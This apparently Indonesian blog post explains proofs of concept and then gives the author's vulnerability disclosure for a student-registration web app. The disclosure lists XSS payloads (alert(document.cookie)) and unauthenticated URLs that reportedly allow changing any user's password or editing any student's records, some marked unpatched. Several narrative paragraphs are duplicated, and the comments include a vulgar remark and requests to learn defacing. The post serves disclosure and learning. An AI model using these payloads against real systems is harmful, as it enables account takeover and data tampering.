Proof of Concept, atau yang
sering di dengar dengan singkatan P.o.C merupakan sebuah sinopsis dari
sebuah metode/cara yang biasanya untuk memberikan bukti bahwa sebuah
sistem dapat di exploit. P.o.C yang lengkap (yang bikin rajin) biasanya
membahasa bug yang mereka temukan secara terperinci, dan penjelasan yang
sangat baik. Mereka biasanya memberikan potongan kode program yang
terdapat pada sistem tersebut, dan memberikan solusi dari bug tersebut.
P.o.C dapat dengan mudah ditemui pada website2 security besar seperti milw0rm, packetstormsecurity, securityfocus, maupun website2 komunitas lainnya. Terdapat berbagai macam cara penyajian sebuah P.o.C. Ada yang cuman ngasih cara untuk exploit nya, ada yang pake di bahas dulu, ada juga yang sudah dibuat menjadi sebuah program untuk pembuktiaan.. biasanya source c++,python atau perl. Beberapa PoC ada yg di publish setelah melakukan koordinasi terlebih dahulu dengan vendor sistem nya, sehingga dari pihak vendor dapat mengeluarkan update dari sistem mereka, sedangkan ada juga yang main langsung di publish!
P.o.C dapat dengan mudah ditemui pada website2 security besar seperti milw0rm, packetstormsecurity, securityfocus, maupun website2 komunitas lainnya. Terdapat berbagai macam cara penyajian sebuah P.o.C. Ada yang cuman ngasih cara untuk exploit nya, ada yang pake di bahas dulu, ada juga yang sudah dibuat menjadi sebuah program untuk pembuktiaan.. biasanya source c++,python atau perl. Beberapa PoC ada yg di publish setelah melakukan koordinasi terlebih dahulu dengan vendor sistem nya, sehingga dari pihak vendor dapat mengeluarkan update dari sistem mereka, sedangkan ada juga yang main langsung di publish!
Itulah mengapa, merupakan sebuah kewajiban dari seorang administrator untuk selalu update terhadap masalah sistem keamanan.
Yang ingin gw share disini adalah, kebanyakan dari kenalan saya di dunia maya.. banyak sekali yang mengandalkan PoC terbaru untuk melakukan hacking, saya akui dulu saya juga seperti ini. Namun gw coba berpikir, kenapa hacking harus tergantung dari orang lain? bukankah lebih mengasyikan jika kita dapat menciptakan PoC sendiri, dengan melakukan analisa terhadap sebuah sistem.
Akhirnya, penggunaan PoC di website2 terkemuka itu menjadi sedikit bergeser di mata saya. Saya lebih menggunakannya sebagai bahan bacaan. Mereka biasanya memberikan sedikit gambaran dari terjadinya bug tersebut, sehingga saya bisa menganalisanya. Bagaimana?
Saya mencoba mencari sistem yg vulnerable nya, saya install di komputer sendiri rumah saya, dan saya coba terapkan konsep yang diberikan oleh author nya. Menurut saya, ini lebih bermanfaat bagi saya! Saya dapat memperhatikan secara jelas proses exploit yang terjadi, saya dapat melakukan simulasi, dan akhirnya saya mendapat sesuatu yang berharga, yaitu 'ilmu'.
Ada seorang teman saya yg mengatakan, bahwa ini adalah proses fase keluar dari gelar script kiddies, tapi saya mengatakan kalo saya masih seorang newbie yang pengen belajar saja
Bagi pemula seperti saya ini, merupakan sebuah kebanggan tersendiri agar dapat menghasilkan sebuah PoC. Setelah perjuangan lama, akhirnya saya mempunyai PoC pertama saya, semoga bukan yang terakhir walaupun teknik yang digunakan hanya tingkat pemula sekali, tapi nyatanya bisa di exploit!
Semoga bisa sebagai bahan pembelajaran, saya publish di blog saya ini juga setelah jauh hari sebelumnya saya sudah melapor kepada pihak vendor nya, walaupun mungkin sebagian orang tidak tahu sistem apa yg saya exploit, dan tidak berguna secara langsung.. dari awal saya membuat blog ini, berfungsi sebagai catatan kecil saya, dan juga sebagai knowledge management pribadi saya. Semoga pihak vendor dapat melakukan update secara keseluruhan.
Yang ingin gw share disini adalah, kebanyakan dari kenalan saya di dunia maya.. banyak sekali yang mengandalkan PoC terbaru untuk melakukan hacking, saya akui dulu saya juga seperti ini. Namun gw coba berpikir, kenapa hacking harus tergantung dari orang lain? bukankah lebih mengasyikan jika kita dapat menciptakan PoC sendiri, dengan melakukan analisa terhadap sebuah sistem.
Akhirnya, penggunaan PoC di website2 terkemuka itu menjadi sedikit bergeser di mata saya. Saya lebih menggunakannya sebagai bahan bacaan. Mereka biasanya memberikan sedikit gambaran dari terjadinya bug tersebut, sehingga saya bisa menganalisanya. Bagaimana?
Saya mencoba mencari sistem yg vulnerable nya, saya install di komputer sendiri rumah saya, dan saya coba terapkan konsep yang diberikan oleh author nya. Menurut saya, ini lebih bermanfaat bagi saya! Saya dapat memperhatikan secara jelas proses exploit yang terjadi, saya dapat melakukan simulasi, dan akhirnya saya mendapat sesuatu yang berharga, yaitu 'ilmu'.
Ada seorang teman saya yg mengatakan, bahwa ini adalah proses fase keluar dari gelar script kiddies, tapi saya mengatakan kalo saya masih seorang newbie yang pengen belajar saja
Bagi pemula seperti saya ini, merupakan sebuah kebanggan tersendiri agar dapat menghasilkan sebuah PoC. Setelah perjuangan lama, akhirnya saya mempunyai PoC pertama saya, semoga bukan yang terakhir walaupun teknik yang digunakan hanya tingkat pemula sekali, tapi nyatanya bisa di exploit!
Semoga bisa sebagai bahan pembelajaran, saya publish di blog saya ini juga setelah jauh hari sebelumnya saya sudah melapor kepada pihak vendor nya, walaupun mungkin sebagian orang tidak tahu sistem apa yg saya exploit, dan tidak berguna secara langsung.. dari awal saya membuat blog ini, berfungsi sebagai catatan kecil saya, dan juga sebagai knowledge management pribadi saya. Semoga pihak vendor dapat melakukan update secara keseluruhan.
###############################################################
Exploit
Apps : Script : SiaP! KRS Online by TSM Labs
Reported : 8 Mei 2008
Published : 13 Mei 2008
################################################################
Proof of Concept
(P.o.C)
by: Dhiratara
################################################################
----------------------------------------------------------------
Type : Multiple XSS Vulnerabilities
----------------------------------------------------------------
1 : Vulnerable : http://[site]/sylabus.php?mk=alert(document.cookie)
PoC : http://192.168.20.253/sylabus.php?mk=alert(document.cookie)
Status : [Not Patched | Annonymous | Threat Level: Low]
2 : Vulnerable : http://[site]/absensi.php?op=StatusUAS&nim=alert(document.cookie)
PoC : http://192.168.20.253/absensi.php?op=StatusUAS&nim=alert(document.cookie)
Status : [Not Patched | Login Needed | Threat Level: Low]
3 : Vulerable : http://[site]/phpinfo.php?GLOBALS[test]=alert(document.cookie);
PoC : http://192.168.20.253/phpinfo.php?GLOBALS[test]=alert(document.cookie);
[Not Patched | Annonymous | Threat Level: Low]
################################################################
----------------------------------------------------------------
Type : Unauthenticated Session Module
----------------------------------------------------------------
1 : Vulnerable : http://[site]/password.php
PoC : http://192.168.20.253/password.php
Status : [ Patched | Annonymous | Threat Level: HIGH | Note : Bisa ganti password semua user tanpa login sama sekali!]
2 : Vulnerable : http://[site]/krs.php?op=pilih&isi=[Nama Periode]&kode=[Kode Perdiode]&kode_mhs=[NIM]
PoC : http://192.168.20.253/krs.php?op=pilih&isi=Semester%20Pendek,%20Tahun%20Ajaran%202007-2008&kode=07P&kode_mhs=206000001
Status : [Patched| Annonymous | Threat Level: HIGH | Note : Bisa isi & edit KRS semua user tanpa login sama sekali!]
3 : Vulnerable : http://[site]/front_mhs.php?nim=[NIM]
PoC : http://192.168.20.253/front_mhs.php?nim=206000001
Status : [Not Patched | Login Needed | Threat Level: Low]
4 : Vulnerable : http://[site]/absensi.php?op=StatusUAS&nim=[NIM]
PoC : http://192.168.20.253/absensi.php?op=StatusUAS&nim=206000001
Status : [Not Patched | Login Needed | Threat Level: Low]
5 : Vulnerable : http://192.168.20.253/whata.php?nim=[NIM]
PoC : http://192.168.20.253/whata.php?nim=206000001
Status : [Not Patched | Annonymous | Threat Level: Low | Note : Pilihan buat periode mana yg di print, semua user =P]
6 : Vulnerable : http://192.168.20.253/print.khslengkap.php?nim=[NIM]
PoC : http://192.168.20.253/print.khslengkap.php?nim=206000001
Status : [Not Patched | Annonymous | Threat Level: Low]
7 : Vulnerable : http://192.168.20.253/print.transkrip.php?nim=[NIM]
PoC : http://192.168.20.253/print.transkrip.php?nim=206000001
Status : [Not Patched | Annonymous | Threat Level: Low]
Note: Vendor terlalu percaya dengan input user, seharusnya ganti variable penting semacam $nim pada query dengan menggunakan variable Session.
----------------------------------------------------------------
#############################################
Thanks, semoga bermanfaat!
Source : http://dhiratara.blogspot.com/2008/05/proof-of-concept-poc.html
sipp
ReplyDeleteWebblogpur
mantap gan ilmu bertambah ni
ReplyDeleteajarin saya daface mim plisss
ReplyDeleteDeface Memek
ReplyDeleteAwww
ReplyDeleteBagi nomer wa gan
ReplyDeleteBagi nomer wa gan
ReplyDelete